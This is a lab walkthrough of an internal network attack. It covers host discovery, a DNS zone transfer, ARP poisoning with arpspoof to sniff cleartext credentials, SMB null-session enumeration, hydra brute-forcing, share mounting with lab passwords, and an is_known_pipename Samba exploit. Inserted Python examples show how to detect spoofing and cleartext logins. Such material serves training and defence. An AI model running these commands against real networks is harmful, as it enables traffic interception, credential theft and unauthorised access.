
POISONING & SNIFFING LAB

Welcome N1NJ10. Today we will talk about sniffing and poisoning: how it is done, the tools, the tactics, spoofing, and more.

First, let's see what IPs our NICs have.

Hint: our scope is the 172.16.5.0/24 range only, and only the DNS and SMB services.

ifconfig
(Screenshot: ifconfig output)

As we can see, we can reach both the 192.168.0.0/24 and the 172.16.5.0/24 networks, but our scope is the 172.16.5.0/24 range. Let's do an ARP scan with three methods. First, with the arp-scan tool:

arp-scan

(Screenshot: arp-scan output)

Second, the Nmap tool:

nmap -sn 172.16.5.* -T4 

HINTS: -sn disables the port scan; -T selects a timing template to speed up the process, and I chose 4 (see the nmap docs on timing templates for more info).

(Screenshot: ARP scan with nmap)

The last one is with the netdiscover tool:

netdiscover -r 172.16.5.0/24 -i eth1 -P 

HINTS: -r is the IP range to scan, -i specifies the NIC, -P prints the results in a format suitable for parsing.

(Screenshot: netdiscover shows no results)

I tried many solutions but it failed every time; I checked Wireshark too, but with no useful result.

At the end I found this is a global issue; you can solve it from here:

Netdiscover not showing any results (unix.stackexchange.com)

Finally I discovered that I can make an ARP scan with netdiscover using the NIC only:

(Screenshot: netdiscover working)

Fine, let's do a port scan to see what services run on them. I used nmap again:

nmap -Pn --disable-arp-ping -T4 -n -p53 -sT -sU 172.16.5.1,6,5,10

HINTS: -Pn disables the ping; --disable-arp-ping disables ARP/Neighbor Discovery; -T4 as before; -n never resolves DNS names; -p specifies the ports; -sT for a TCP connect scan; -sU for a UDP scan.

Why did I use both a full TCP scan and a UDP scan?

Because DNS works over both TCP and UDP.

(Screenshot: DNS port scan)

OK, it seems 172.16.5.10 is a DNS server. Let's use dig to ask 172.16.5.10 about the other hosts that exist in our network:

dig @172.16.5.10 -x IP +nocookie -t any

HINTS: @IP is the DNS server to ask; -x is the IP to do a reverse lookup on; +nocookie sends the query without cookie data; -t is the query type, and I set it to any to ask about all types.

(Screenshot: dig result)

Fine, I found 3 domains, and it seems all of them are under the same domain, sportsfoo.com.

OK, we can try a zone transfer query for it:

dig @172.16.5.10 sportsfoo.com -t AXFR +nocookie +noall +answer 

HINTS: -t AXFR requests a zone transfer.

(Screenshot: sportsfoo.com zone transfer)

What! The ftp and intranet.sportsfoo.com records point to a different network, 10.10.10.6. Can we access it?

(Screenshot: ping 10.10.10.6)

Fine, we can reach it. Let's see how we get there with traceroute:

(Screenshot: traceroute to 10.10.10.6)

OK, let's see all the networks we can reach:

ip route show 
(Screenshot: ip route output)

With this information we can draw the topology of this network:

(Diagram: network topology)

Fine. Now that we know the topology, we can sniff.

Let's start with 172.16.5.5 and 172.16.5.1. I prefer to use arpspoof for this mission:

arpspoof -i eth1 -t 172.16.5.6 -r 172.16.5.1

HINTS: -i is the NIC; -t is our target IP; -r is the IP whose MAC we want to spoof. You should open a second terminal and run the same command with the IPs reversed.

Note: you need to enable ip_forward for this to work.

(Screenshot: enabling ip_forward)
(Screenshot: arpspoof running)
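The poisoning above is visible on the wire as one MAC suddenly answering for two IPs while the real owners keep answering too, so the bindings flap. As an added example (not from the lab), here is the detection logic a monitor such as arpwatch applies, run over a constructed reply feed; the attacker MAC 00:00:5e:00:53:aa is hypothetical.

```python
"""Detect ARP poisoning in a stream of ARP replies.

Added example, not from the lab page. REPLIES is a constructed feed of
(sender MAC, sender IP) pairs as a sensor such as tshark or arpwatch would
report on the 172.16.5.0/24 segment; 00:00:5e:00:53:aa is a hypothetical
attacker MAC from the IANA documentation range.
"""
from collections import defaultdict

REPLIES = [
    ("52:54:00:11:11:01", "172.16.5.1"),  # gateway answers legitimately
    ("52:54:00:11:11:06", "172.16.5.6"),  # host answers legitimately
    ("00:00:5e:00:53:aa", "172.16.5.1"),  # attacker claims to be the gateway
    ("00:00:5e:00:53:aa", "172.16.5.6"),  # attacker claims to be the host
    ("52:54:00:11:11:01", "172.16.5.1"),  # real gateway answers again: flapping
]

# MACs that legitimately own several IPs (e.g. a router with aliases) go
# here to avoid false positives; empty for this constructed segment.
ALLOW_MULTI_IP = set()


def detect_arp_spoof(replies, allow_multi_ip=ALLOW_MULTI_IP):
    """Return alerts: an IP whose MAC changes, or one MAC claiming two IPs.

    Both patterns appear when arpspoof poisons a pair of hosts: the attacker
    MAC takes over both IPs, and the real owners keep answering, so the
    binding flaps back and forth.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for mac, ip in replies:
        mac = mac.lower()
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append(f"ip_mac_change {ip} {prev}->{mac}")
        ip_to_mac[ip] = mac
        ips = mac_to_ips[mac]
        if ip not in ips:
            ips.add(ip)
            if len(ips) > 1 and mac not in allow_multi_ip:
                alerts.append(f"mac_claims_multiple_ips {mac} {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(REPLIES):
        print(alert)
```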

Also run driftnet to see if any pictures are being sent:

(Screenshot: driftnet output)

And open Wireshark to analyze the packets:

(Screenshot: Wireshark capture)

After analyzing them I found these credentials:

(Screenshot: captured credentials)

Repeat the last 3 steps for all the IPs: arpspoof, driftnet, and Wireshark to analyze the packets.

So I found these packets:

(Screenshot: DNS traffic)
(Screenshot: captured credentials)

OK, it seems we found good credentials to access the web page:

(Screenshot: web credentials)

It seems we have FTP credentials as well:

(Screenshot: FTP credentials)

HTTP again!

(Screenshot: Wireshark capture)
(Screenshot: HTTP credentials)

It seems we have many HTTP credentials to use 😅

(Screenshot: FTP credentials)
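Every credential above was recoverable because FTP and HTTP carry it in cleartext; a network sensor can flag the same thing the moment it happens. As an added example (not from the lab), a detector run over constructed payloads of the kinds seen here: an FTP USER/PASS pair, an HTTP Basic header and an HTTP form login. Hosts, users and passwords are invented, and the findings report only the username.

```python
"""Flag cleartext credential protocols in captured TCP payloads.

Added example, not from the lab page. SAMPLE_STREAMS mimics reassembled TCP
payloads a sensor might hand to an analyst; users and passwords are invented
and the intranet host name is taken from the lab's zone transfer.
"""
import base64
import re
from urllib.parse import parse_qs

SAMPLE_STREAMS = [
    # Constructed FTP login, like the sniffed FTP session above.
    (21, "USER alice\r\nPASS hunter2\r\n"),
    # Constructed HTTP Basic header (base64 of "bob:s3cret").
    (80, "GET /intranet/ HTTP/1.1\r\nHost: intranet.sportsfoo.com\r\n"
         "Authorization: Basic Ym9iOnMzY3JldA==\r\n\r\n"),
    # Constructed HTTP form login.
    (80, "POST /login HTTP/1.1\r\nHost: intranet.sportsfoo.com\r\n"
         "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
         "username=carol&password=letmein"),
    # TLS record on 443: encrypted, nothing to flag.
    (443, "\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"),
]

BASIC_RE = re.compile(r"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.I | re.M)
FTP_RE = re.compile(r"^USER\s+(\S+)\r?\n(?:.*\r?\n)*?PASS\s+\S+", re.I | re.M)
PW_FIELDS = ("password", "passwd", "pass", "pwd")


def find_cleartext_creds(streams):
    """Return (port, protocol, username) for each cleartext credential seen."""
    findings = []
    for port, payload in streams:
        m = FTP_RE.search(payload)
        if m:
            findings.append((port, "ftp", m.group(1)))
        for token in BASIC_RE.findall(payload):
            try:  # decode only to recover the user; the secret is never kept
                user = base64.b64decode(token, validate=True).decode().split(":", 1)[0]
            except (ValueError, UnicodeDecodeError):
                user = "<undecodable>"
            findings.append((port, "http-basic", user))
        if payload.startswith("POST ") and "\r\n\r\n" in payload:
            fields = parse_qs(payload.split("\r\n\r\n", 1)[1])
            if any(f in fields for f in PW_FIELDS):
                user = fields.get("username", fields.get("user", ["?"]))[0]
                findings.append((port, "http-form", user))
    return findings
```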

Again!

(Screenshot: SMB traffic)

Well, SMB is a good sign.

(Screenshot: the finance share)

Now it seems 172.16.5.10 has an SMB server.

OK, let's scan it:

nmap -T4 -sS -Pn --disable-arp-ping -n 172.16.5.10
(Screenshot: nmap output)

We find that it really does have SMB. Let's try to find more information with the enum4linux tool:

enum4linux -a 172.16.5.10 

┌──(rootkali)-[~] ┌──(rootkali)-[~] └─# enum4linux -a 172.16.5.10 130 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu May 11 14:19:16 2023

========================== | Target Information | ========================== Target ……….. 172.16.5.10 RID Range …….. 500–550,1000–1050 Username ……… ‘’ Password ……… ‘’ Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=================================================== | Enumerating Workgroup/Domain on 172.16.5.10 | =================================================== [E] Can’t find workgroup/domain

=========================================== | Nbtstat Information for 172.16.5.10 | =========================================== Looking up status of 172.16.5.10 No reply from 172.16.5.10

==================================== | Session Check on 172.16.5.10 | ==================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. [+] Server 172.16.5.10 allows sessions using username ‘’, password ‘’ Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451. [+] Got domain/workgroup name:

========================================== | Getting domain SID for 172.16.5.10 | ========================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359. Domain Name: EXPLOITLABS Domain Sid: (NULL SID) [+] Can’t determine if host is part of domain or part of a workgroup

===================================== | OS information on 172.16.5.10 | ===================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458. Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 172.16.5.10 from smbclient: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467. [+] Got OS info for 172.16.5.10 from srvinfo: SAMBA-EXPLOIT Wk Sv PrQ Unx NT SNT samba.exploit.lab platform_id : 500 os version : 4.9 server type : 0x809a03

============================ | Users on 172.16.5.10 | ============================ Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866. index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: admin Name: Desc: index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: almir Name: Desc:

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881. user:[admin] rid:[0x3e8] user:[almir] rid:[0x3e9]

======================================== | Share Enumeration on 172.16.5.10 | ======================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.

Sharename Type Comment — — — — — — — — — — - technology Disk finance Disk IPC$ IPC IPC Service (samba.exploit.lab) SMB1 disabled — no workgroup available

[+] Attempting to map shares on 172.16.5.10 Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654. //172.16.5.10/technology Mapping: DENIED, Listing: N/A Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654. //172.16.5.10/finance Mapping: DENIED, Listing: N/A Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654. //172.16.5.10/IPC$ [E] Can’t understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

=================================================== | Password Policy Information for 172.16.5.10 | ===================================================

[+] Attaching to 172.16.5.10 using a NULL share

[+] Trying protocol 139/SMB…

[+] Found domain(s):

[+] SAMBA-EXPLOIT [+] Builtin

[+] Password Info for Domain: SAMBA-EXPLOIT

[+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: 37 days 6 hours 21 minutes [+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0

[+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: 37 days 6 hours 21 minutes

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled Minimum Password Length: 5

============================= | Groups on 172.16.5.10 | ============================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:

[+] Getting builtin group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting local groups:

[+] Getting local group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.

[+] Getting domain groups:

[+] Getting domain group memberships:

====================================================================== | Users on 172.16.5.10 via RID cycling (RIDS: 500–550,1000–1050) | ====================================================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. [I] Found new SID: S-1–22–1 Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. [I] Found new SID: S-1–5–21–2476325587–2202151648–2882393862 Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742. [I] Found new SID: S-1–5–32 [+] Enumerating users using SID S-1–22–1 and logon username ‘’, password ‘’ Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.

============================================ | Getting printer info for 172.16.5.10 | ============================================ Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991. No printers returned.

enum4linux complete on Thu May 11 14:20:11 2023

It seems we have a null session here. Let's confirm it with the smbclient command:

smbclient -L 172.16.5.10

(Screenshot: null session share listing)
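The enum4linux run above already tells a defender what to fix: anonymous sessions are accepted, share names are listed without credentials, and the password policy has no complexity, a 5-character minimum and no lockout. As an added example (not part of the lab), here is that triage automated over an excerpt trimmed from the output above; the 12-character minimum is an assumed baseline, not something the tool reports.

```python
"""Triage an enum4linux report for SMB hardening gaps.

Added example, not part of the lab. REPORT is trimmed from the enum4linux
output shown above (same host and values) so the checks can run offline;
MIN_LENGTH is the editor's assumed policy floor.
"""
import re

REPORT = """\
[+] Server 172.16.5.10 allows sessions using username '', password ''
        Sharename       Type      Comment
        ---------       ----      -------
        technology      Disk
        finance         Disk
        IPC$            IPC       IPC Service (samba.exploit.lab)
        [+] Minimum password length: 5
        [+] Account Lockout Threshold: None
Password Complexity: Disabled
Minimum Password Length: 5
"""

MIN_LENGTH = 12  # assumed minimum an auditor would accept


def triage_smb(report, min_length=MIN_LENGTH):
    """Return hardening findings derived from enum4linux report text."""
    findings = []
    null = re.search(r"Server (\S+) allows sessions using username '', password ''", report)
    if null:
        findings.append(f"null_session_allowed host={null.group(1)}")
        # Share names only count as a finding when they were learned anonymously.
        shares = re.findall(r"^\s*(\S+)\s+Disk\b", report, re.M)
        if shares:
            findings.append("shares_enumerable_anonymously " + ",".join(shares))
    length = re.search(r"Minimum password length:\s*(\d+)", report, re.I)
    if length and int(length.group(1)) < min_length:
        findings.append(f"min_password_length={length.group(1)} below {min_length}")
    if re.search(r"Password Complexity:\s*Disabled", report):
        findings.append("password_complexity_disabled")
    if re.search(r"Account Lockout Threshold:\s*None", report):
        findings.append("no_account_lockout")
    return findings


if __name__ == "__main__":
    for finding in triage_smb(REPORT):
        print(finding)
```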

Bingo. Now we know we have a null session here. One thing we are still missing is valid credentials. Let's take the credentials we found earlier and use hydra to brute-force the SMB server:

hydra -L Users.txt -P pass.txt smb://172.16.5.10

(Screenshot: hydra output)

OK, we are good to run psexec from Metasploit and set our arguments.

Note: for more information you can see this writeup or this site.

(Screenshot: psexec fails)

We failed. I searched for this issue, but I understood it is not an issue: I read the exploit code and found this:

(Screenshot: exploit source)

So I understood that none of the credentials we found are administrator credentials.

After searching for a while I found that I can exploit it with the is_known_pipename() exploit.

Note: read these resources, then continue: how-to-mount-a-windows-samba-windows-share-under-linux, is_known_pipename, metasploit-6-smb-encryption-error-fixing.

First, let's test that our credentials have access to the SMB server:

(Screenshot: testing the admin credentials)

We are good to mount finance and technology with admin and almir:

mount -t cifs -o user=almir,password=Corinthians2012,rw,vers=1.0 //172.16.5.10/finance ./N1NJ10

Note: make a directory to mount on.

(Screenshot: finance share mounted)

This time with the technology share:

mount -t cifs //172.16.5.10/technology ./N1NJ10 -o rw,vers=1.0,user=admin,password=et1@sR7!

(Screenshot: technology share mounted)

Now we know that the is_known_pipename() exploit will work well. Let's see:

(Screenshot: exploit succeeds)

We are in N1NJ10 😉

This lab was full of information that I learned, and I personally hope you have benefited from it.

Now you've finished, N1NJ10. I hope you have benefited from this lab. If something doesn't make sense, you can reach me on social media.

I enjoyed the lab and will post more labs and other security stuff in the future.
